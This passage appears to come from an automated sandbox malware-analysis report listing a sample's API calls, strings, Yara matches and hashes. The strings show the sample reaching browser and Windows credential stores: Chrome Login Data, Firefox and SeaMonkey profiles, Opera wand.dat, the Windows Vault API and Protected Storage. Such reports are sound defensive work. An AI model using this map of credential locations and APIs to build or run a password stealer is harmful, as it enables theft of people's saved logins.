                                                                                  • Part of subcall function 00408619: wcslen.MSVCRT ref: 00408678
                                                                                  • Part of subcall function 00408619: wcsncmp.MSVCRT(?,?,?,?,00000000,?), ref: 004086AE
                                                                                  • Part of subcall function 00408619: memset.MSVCRT ref: 00408725
                                                                                  • Part of subcall function 00408619: memcpy.MSVCRT ref: 00408746
                                                                                  • Part of subcall function 00409EB8: LoadLibraryW.KERNELBASE(pstorec.dll,00000000,004101A5,?,?,?,?,?,0040328B,?), ref: 00409EC9
                                                                                  • Part of subcall function 00409EB8: GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00409EDC
                                                                                  • Part of subcall function 0040F2E6: memset.MSVCRT ref: 0040F309
                                                                                  • Part of subcall function 0040F2E6: memset.MSVCRT ref: 0040F31E
                                                                                  • Part of subcall function 0040F2E6: memset.MSVCRT ref: 0040F333
                                                                                  • Part of subcall function 0040F2E6: memset.MSVCRT ref: 0040F348
                                                                                  • Part of subcall function 0040F2E6: memset.MSVCRT ref: 0040F35D
                                                                                  • Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F383
                                                                                  • Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F394
                                                                                  • Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F3CC
                                                                                  • Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F3DA
                                                                                  • Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F413
                                                                                  • Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F421
                                                                                • memset.MSVCRT ref: 004103AA
                                                                                • memset.MSVCRT ref: 004103C6
                                                                                • memset.MSVCRT ref: 004103E2
                                                                                • memset.MSVCRT ref: 004104F9
                                                                                  • Part of subcall function 00406DD9: memset.MSVCRT ref: 00406E17
                                                                                  • Part of subcall function 00406DD9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000,?,00000000,?), ref: 00406E30
                                                                                  • Part of subcall function 00406DD9: memset.MSVCRT ref: 00406E69
                                                                                  • Part of subcall function 00406DD9: memset.MSVCRT ref: 00406E81
                                                                                  • Part of subcall function 00406DD9: memset.MSVCRT ref: 00406E99
                                                                                  • Part of subcall function 00406DD9: memset.MSVCRT ref: 00406EB1
                                                                                  • Part of subcall function 00406DD9: wcslen.MSVCRT ref: 00406EBC
                                                                                  • Part of subcall function 00406DD9: wcslen.MSVCRT ref: 00406ECA
                                                                                  • Part of subcall function 00406DD9: wcslen.MSVCRT ref: 00406EF9
                                                                                  • Part of subcall function 00406DD9: wcslen.MSVCRT ref: 00406F07
                                                                                • wcslen.MSVCRT ref: 00410437
                                                                                • wcslen.MSVCRT ref: 00410446
                                                                                • wcslen.MSVCRT ref: 0041048B
                                                                                • wcslen.MSVCRT ref: 0041049A
                                                                                • memset.MSVCRT ref: 00410562
                                                                                • memset.MSVCRT ref: 0041057A
                                                                                • wcslen.MSVCRT ref: 00410593
                                                                                • wcslen.MSVCRT ref: 004105A1
                                                                                • wcslen.MSVCRT ref: 004105FC
                                                                                • wcslen.MSVCRT ref: 0041060A
                                                                                • memset.MSVCRT ref: 0041068A
                                                                                • wcslen.MSVCRT ref: 00410699
                                                                                • wcslen.MSVCRT ref: 00410720
                                                                                • wcslen.MSVCRT ref: 0041072E
                                                                                • wcslen.MSVCRT ref: 004106A7
                                                                                  • Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
                                                                                  • Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0
                                                                                  • Part of subcall function 0040839D: wcscmp.MSVCRT ref: 004083BC
                                                                                  • Part of subcall function 0040839D: wcscmp.MSVCRT ref: 004083CD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wcslen$memset$wcscmp$AddressByteCharCredEnumerateEnvironmentExpandLibraryLoadMultiProcStringsWide_wcslwrmemcpywcscatwcscpywcsncmpwcsrchr
                                                                                • String ID: %programfiles%\Sea Monkey$Google\Chrome SxS\User Data$Google\Chrome\User Data$Opera$Opera\Opera7\profile\wand.dat$Opera\Opera\wand.dat$Path$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe$wand.dat
                                                                                • API String ID: 3717286792-109336846
                                                                                • Opcode ID: 950feec3eb3c7ddcc0b68e018bc609b8eaa114617dc979202627b30a43ba34ef
                                                                                • Instruction ID: 5236af18994b30efd903e1d9b734594bd5ee8d83944705dbeea0fe3cf72f0f99
                                                                                • Opcode Fuzzy Hash: 950feec3eb3c7ddcc0b68e018bc609b8eaa114617dc979202627b30a43ba34ef
                                                                                • Instruction Fuzzy Hash: A0F17771901218ABDB20EB51DD85ADEB378AF04714F5444ABF508A7181E7B8AFC4CF9E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LoadLibraryW.KERNELBASE(vaultcli.dll,?,00000000,00442385,?,00000000,?), ref: 004422D4
                                                                                • GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 004422E9
                                                                                • GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 004422F6
                                                                                • GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 00442303
                                                                                • GetProcAddress.KERNEL32(00000000,VaultFree), ref: 00442310
                                                                                • GetProcAddress.KERNEL32(00000000,VaultGetInformation), ref: 0044231D
                                                                                • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0044232B
                                                                                • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 00442334
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad
                                                                                • String ID: VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetInformation$VaultGetItem$VaultOpenVault$vaultcli.dll
                                                                                • API String ID: 2238633743-2107673790
                                                                                • Opcode ID: 963817e17c3864fb71b6f00927cb3e5fc30341a44c0b645a38e795921616907a
                                                                                • Instruction ID: a68d3860b1f677998bacfaa0c7abd00484677722be3dbe7bb4ba7aced869f3e7
                                                                                • Opcode Fuzzy Hash: 963817e17c3864fb71b6f00927cb3e5fc30341a44c0b645a38e795921616907a
                                                                                • Instruction Fuzzy Hash: CB012874941B04AEEB306F728E88E07BEF4EF94B017108D2EE49A92A10D779A800CE14
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040F0F8
                                                                                • memset.MSVCRT ref: 0040F10D
                                                                                • memset.MSVCRT ref: 0040F122
                                                                                • memset.MSVCRT ref: 0040F137
                                                                                • memset.MSVCRT ref: 0040F14C
                                                                                  • Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
                                                                                  • Part of subcall function 00412270: memset.MSVCRT ref: 004122C9
                                                                                  • Part of subcall function 00412270: RegCloseKey.ADVAPI32(?), ref: 00412330
                                                                                  • Part of subcall function 00412270: wcscpy.MSVCRT ref: 0041233E
                                                                                • wcslen.MSVCRT ref: 0040F172
                                                                                • wcslen.MSVCRT ref: 0040F183
                                                                                • wcslen.MSVCRT ref: 0040F1BB
                                                                                • wcslen.MSVCRT ref: 0040F1C9
                                                                                • wcslen.MSVCRT ref: 0040F202
                                                                                • wcslen.MSVCRT ref: 0040F210
                                                                                • memset.MSVCRT ref: 0040F296
                                                                                  • Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
                                                                                  • Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset$wcslen$wcscpy$CloseFolderPathSpecialwcscat
                                                                                • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                • API String ID: 2775653040-2068335096
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040F309
                                                                                • memset.MSVCRT ref: 0040F31E
                                                                                • memset.MSVCRT ref: 0040F333
                                                                                • memset.MSVCRT ref: 0040F348
                                                                                • memset.MSVCRT ref: 0040F35D
                                                                                  • Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
                                                                                  • Part of subcall function 00412270: memset.MSVCRT ref: 004122C9
                                                                                  • Part of subcall function 00412270: RegCloseKey.ADVAPI32(?), ref: 00412330
                                                                                  • Part of subcall function 00412270: wcscpy.MSVCRT ref: 0041233E
                                                                                • wcslen.MSVCRT ref: 0040F383
                                                                                • wcslen.MSVCRT ref: 0040F394
                                                                                • wcslen.MSVCRT ref: 0040F3CC
                                                                                • wcslen.MSVCRT ref: 0040F3DA
                                                                                • wcslen.MSVCRT ref: 0040F413
                                                                                • wcslen.MSVCRT ref: 0040F421
                                                                                • memset.MSVCRT ref: 0040F4A7
                                                                                  • Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
                                                                                  • Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset$wcslen$wcscpy$CloseFolderPathSpecialwcscat
                                                                                • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                • API String ID: 2775653040-3369679110
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • memset.MSVCRT ref: 00409102
                                                                                • memset.MSVCRT ref: 0040911A
                                                                                  • Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
                                                                                • wcslen.MSVCRT ref: 00409136
                                                                                • wcslen.MSVCRT ref: 00409145
                                                                                • wcslen.MSVCRT ref: 0040918C
                                                                                • wcslen.MSVCRT ref: 0040919B
                                                                                  • Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
                                                                                  • Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wcslen$memset$FolderPathSpecialwcscatwcscpy
                                                                                • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                • API String ID: 2036768262-2114579845
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 00402778: free.MSVCRT(00000000,0040E508,?,?,?,?,?,/deleteregkey,/savelangfile,?,?), ref: 0040277F
                                                                                  • Part of subcall function 00410168: memset.MSVCRT ref: 004101DA
                                                                                  • Part of subcall function 00410168: wcsrchr.MSVCRT ref: 004101F2
                                                                                  • Part of subcall function 00410168: memset.MSVCRT ref: 004102D9
                                                                                  • Part of subcall function 0040FF51: SetCurrentDirectoryW.KERNEL32(?,?,?,00403292,?), ref: 0040FF9E
                                                                                • memset.MSVCRT ref: 0040330A
                                                                                • memcpy.MSVCRT ref: 0040331C
                                                                                • wcscmp.MSVCRT ref: 00403348
                                                                                • _wcsicmp.MSVCRT ref: 00403385
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset$CurrentDirectory_wcsicmpfreememcpywcscmpwcsrchr
                                                                                • String ID: $J/@
                                                                                • API String ID: 1763786148-830378395
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wcslen$memsetwcscatwcscpy
                                                                                • String ID: Login Data$Web Data
                                                                                • API String ID: 3932597654-4228647177
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040F042
                                                                                • memset.MSVCRT ref: 0040F057
                                                                                  • Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
                                                                                  • Part of subcall function 0040719A: wcslen.MSVCRT ref: 0040719B
                                                                                  • Part of subcall function 0040719A: wcscat.MSVCRT ref: 004071B3
                                                                                • wcscat.MSVCRT ref: 0040F080
                                                                                  • Part of subcall function 00412270: memset.MSVCRT ref: 004122C9
                                                                                  • Part of subcall function 00412270: RegCloseKey.ADVAPI32(?), ref: 00412330
                                                                                  • Part of subcall function 00412270: wcscpy.MSVCRT ref: 0041233E
                                                                                • wcscat.MSVCRT ref: 0040F0A9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                • API String ID: 1534475566-1174173950
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 004121C3: LoadLibraryW.KERNEL32(shell32.dll,0040E314,00000000,?,00000002), ref: 004121D1
                                                                                  • Part of subcall function 004121C3: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 004121E6
                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
                                                                                • memset.MSVCRT ref: 004122C9
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00412330
                                                                                • wcscpy.MSVCRT ref: 0041233E
                                                                                  • Part of subcall function 00407674: GetVersionExW.KERNEL32(00450DA8,0000001A,00412291), ref: 0040768E
                                                                                Strings
                                                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 004122E4, 004122F4
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressCloseFolderLibraryLoadPathProcSpecialVersionmemsetwcscpy
                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                • API String ID: 2699640517-2036018995
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,004112EE,?,?,?,?,?,00000000,?), ref: 00411151
                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 0041116B
                                                                                • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,004112EE,?,?,?,?,?,00000000,?), ref: 0041118E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProcProcessTimes
                                                                                • String ID: GetProcessTimes$kernel32.dll
                                                                                • API String ID: 1714573020-3385500049
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040E0CE
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040E0F7
                                                                                • DeleteObject.GDI32(?), ref: 0040E129
                                                                                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,00000000,0040E36A), ref: 0040E171
                                                                                • LoadIconW.USER32(00000000,00000065), ref: 0040E17A
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ??2@$DeleteHandleIconLoadModuleObject
                                                                                • String ID:
                                                                                • API String ID: 659443934-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                • only a single result allowed for a SELECT that is part of an expression, xrefs: 004380DE
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset
                                                                                • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                • API String ID: 2221118986-1725073988
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _wcsicmp
                                                                                • String ID: /stext
                                                                                • API String ID: 2081463915-3817206916
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • memset.MSVCRT ref: 004161BB
                                                                                • GetSystemInfo.KERNELBASE(00451CE0,?,00000000,00440C34,00000000,?,?,00000003,00000000,00000000), ref: 004161C4
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoSystemmemset
                                                                                • String ID:
                                                                                • API String ID: 3558857096-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,004421F7,00000000,?,00000000,00000000,00410671,?,?), ref: 00407156
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040C5D7,?,?,00000000,00000001,?,?,?,0040E2DC), ref: 0040716F
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 00407EB8: free.MSVCRT(?,00408225,00000000,?,00000000), ref: 00407EBB
                                                                                  • Part of subcall function 00407EB8: free.MSVCRT(?,?,00408225,00000000,?,00000000), ref: 00407EC3
                                                                                • free.MSVCRT(?,00000000,?,00000000), ref: 004082B2
                                                                                  • Part of subcall function 00408001: free.MSVCRT(?,00000000,?,004082EE,00000000,?,00000000), ref: 00408010
                                                                                  • Part of subcall function 00407475: malloc.MSVCRT ref: 00407491
                                                                                  • Part of subcall function 00407475: memcpy.MSVCRT ref: 004074A9
                                                                                  • Part of subcall function 00407475: free.MSVCRT(00000000,00000000,?,00408025,00000002,?,00000000,?,004082EE,00000000,?,00000000), ref: 004074B2
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: free$mallocmemcpy
                                                                                • String ID:
                                                                                • API String ID: 3401966785-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • free.MSVCRT(00000000,00408352,00000000,?,00000000), ref: 0040803E
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: free
                                                                                • String ID:
                                                                                • API String ID: 1294909896-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions